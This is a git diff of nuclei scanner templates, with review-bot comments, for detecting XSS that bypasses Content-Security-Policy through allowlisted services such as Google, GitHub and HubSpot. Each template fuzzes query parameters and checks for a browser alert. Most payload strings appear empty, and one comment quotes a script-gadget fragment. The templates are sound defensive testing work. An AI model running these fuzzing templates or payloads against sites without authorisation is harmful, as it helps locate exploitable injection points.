' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: elysiumwebsite_s3_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "elysiumwebsite_s3_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml b/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml new file mode 100644 index 00000000000..e17d0ab900b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml @@ -0,0 +1,55 @@ +id: eu-battle-net-csp-xss + +info: + name: Content-Security-Policy Bypass via Battle.net EU + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,battlenet + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: eu_battle_net_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "eu_battle_net_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml new file mode 100644 index 00000000000..0a692716d06 --- /dev/null 
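Review bot: The `injection` payload of elysiumwebsite-s3-csp-xss is a single-quoted scalar spanning several lines (`foo` / `{{ [1].reduce(value.alert, 1); }}`); YAML folds each line break inside a single-quoted scalar into one space and strips the leading indentation, so the string that is fuzzed is not the one as written, and the `{{ ... }}` inside it is also the syntax nuclei uses for its own expression evaluation, so it may be rewritten before the request is built. If the line structure is intentional, a `|-` block scalar keeps it verbatim; if not, collapse it onto one line so the value the `body` matcher looks for is unambiguous, and confirm the bytes actually sent with `-debug`. The eu-battle-net-csp-xss hunk that follows on this line uses the single-line form.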
+++ b/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: facebook-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Facebook API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,facebook + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: facebook_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "facebook_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml b/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml new file mode 100644 index 00000000000..8b1cdc20718 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: facebook-csp-xss + +info: + name: Content-Security-Policy Bypass via Facebook + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,facebook + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: facebook_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "facebook_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml new file mode 100644 index 00000000000..060bc59f46f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: fast-wistia-csp-xss + +info: + name: Content-Security-Policy Bypass via Wistia + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wistia + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: fast_wistia_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "fast_wistia_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml new file mode 100644 index 00000000000..ca925f0b35f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: flickr-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Flickr API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,flickr + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: flickr_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "flickr_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml new file mode 100644 index 00000000000..0196cca21bd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: forismatic-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Forismatic API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,forismatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: forismatic_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "forismatic_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml new file mode 100644 index 00000000000..3ea58b62c2c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: forms-hsforms-csp-xss + +info: + name: Content-Security-Policy Bypass via HubSpot Forms + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hubspot + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: forms_hsforms_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "forms_hsforms_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml new file mode 100644 index 00000000000..ef1b668cacf --- /dev/null +++ b/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: forms-hubspot-csp-xss + +info: + name: Content-Security-Policy Bypass via HubSpot + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hubspot + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: forms_hubspot_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "forms_hubspot_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml index d6d09a10b0a..ff73bdbe68a 100644 --- a/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml @@ -1,11 +1,11 @@ id: fwmrm-csp-xss info: - name: Content-Security-Policy Bypass via FreeWheel - author: DhiyaneshDK - severity: high + name: Content-Security-Policy Bypass via Fwmrm + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L2C19-L2C113 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,fwmrm @@ -18,7 +18,7 @@ http: payloads: injection: - - '' + - '' fuzzing: - part: query 
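Review bot: In the fwmrm-csp-xss hunk the template name changes from "Content-Security-Policy Bypass via FreeWheel" to "... via Fwmrm", which swaps the vendor name for a hostname fragment and makes the finding less readable than before. `name: Content-Security-Policy Bypass via FreeWheel (fwmrm.net)` would keep both the vendor and the allowlisted host in the report title, and matches the pattern the other templates follow of naming the product in `info.name`.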
@@ -33,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "fwmrm.net" - - "script-src" - condition: and \ No newline at end of file + - action: waitload + + - action: waitdialog + name: fwmrm_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "fwmrm_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml new file mode 100644 index 00000000000..696c9924bb3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml @@ -0,0 +1,55 @@ +id: geo-moatads-csp-xss + +info: + name: Content-Security-Policy Bypass via Moat Ads + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,moatads + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: geo_moatads_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "geo_moatads_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml b/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml new file mode 100644 index 00000000000..8420e4619ae --- /dev/null 
+++ b/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml @@ -0,0 +1,55 @@ +id: geolocation-onetrust-csp-xss + +info: + name: Content-Security-Policy Bypass via OneTrust Geolocation + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,onetrust + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: geolocation_onetrust_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "geolocation_onetrust_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml new file mode 100644 index 00000000000..9635bf17206 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: getdrip-api-csp-xss + +info: + name: Content-Security-Policy Bypass via GetDrip API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,getdrip + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: getdrip_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "getdrip_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml new file mode 100644 index 00000000000..0caea41160b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml 
@@ -0,0 +1,55 @@
+id: gist-github-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via GitHub Gist
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,github
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: gist_github_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "gist_github_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml
new file mode 100644
index 00000000000..fe55a22448f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: github-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via GitHub API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,github
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: github_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "github_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml b/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml
new file mode 100644
index 00000000000..bd6d7f40e97
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: global-apis-naver-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Naver APIs
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,naver
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: global_apis_naver_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "global_apis_naver_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml b/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml
new file mode 100644
index 00000000000..616a1a9eb54
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: go-dev-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Go.dev
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,golang
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: go_dev_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "go_dev_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml
new file mode 100644
index 00000000000..ae14d7c3977
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml
@@ -0,0 +1,55 @@ +id: go-snyk-csp-xss + +info: + name: Content-Security-Policy Bypass via Snyk + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,snyk + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: go_snyk_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "go_snyk_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml index 443dc670aa3..10c39f77bac 100644 --- a/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml @@ -2,10 +2,10 @@ id: google-accounts-csp-xss info: name: Content-Security-Policy Bypass via Google Accounts - author: DhiyaneshDK - severity: high + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L7C21-L7C109 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,google @@ -18,7 +18,7 @@ http: payloads: injection: - - '' + - '' fuzzing: - part: query 
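Review bot: The `@@ -2,10 +2,10 @@` hunk of google-accounts-csp-xss.yaml replaces a commit-pinned, line-anchored reference with `https://github.com/renniepak/CSPBypass/blob/main/data.tsv`, so the reference no longer identifies which entry of that list this template implements and will drift as the file changes on `main`. Keeping the pinned URL alongside the generic one, or adding a short `description` naming the allowlisted host, would preserve that traceability. Every new template in this patch carries the same unpinned reference, so the same applies there. The severity drop from `high` to `medium` in the same hunk is not explained in the commit message; a one-line rationale would help later reviewers.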
@@ -33,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "accounts.google.com" - - "script-src" - condition: and \ No newline at end of file + - action: waitload + + - action: waitdialog + name: google_accounts_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "google_accounts_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml new file mode 100644 index 00000000000..f4646ed44b6 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml @@ -0,0 +1,55 @@ +id: google-ajax-csp-xss + +info: + name: Content-Security-Policy Bypass via Google AJAX + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: google_ajax_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "google_ajax_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..2108c8e9340
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: google-analytics-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Analytics
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google-analytics
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: google_analytics_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "google_analytics_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml
new file mode 100644
index 00000000000..afeb3eac91c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml
@@ -0,0 +1,56 @@
+id: google-apis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google APIs
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: google_apis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "google_apis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
deleted file mode 100644
index b6fc118d668..00000000000
--- a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
+++ /dev/null
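Review bot: `injection` now carries two payloads but there is no `stop-at-first-match: true`, which both files this one replaces (google-csp-xss and googleapis-csp-xss, deleted in the next two hunks) had; with `mode: single` and a parameter that reflects anything, both payloads will satisfy the body matcher, and if `http_matched` is populated per match the headless flow will run twice and may report the same endpoint twice. Restoring `stop-at-first-match: true` after the `fuzzing` block, as the deleted files did, keeps the previous one-finding-per-endpoint behaviour.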
@@ -1,51 +0,0 @@ -id: google-csp-xss - -info: - name: Content-Security-Policy Bypass via Google - author: DhiyaneshDK - severity: high - reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L186 - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L187 - metadata: - verified: true - tags: xss,csp-bypass,google - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '' - - "" - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{url_encode(injection)}}" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "google.com" - - "script-src" - condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml deleted file mode 100644 index da72ae1874d..00000000000 --- a/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml +++ /dev/null 
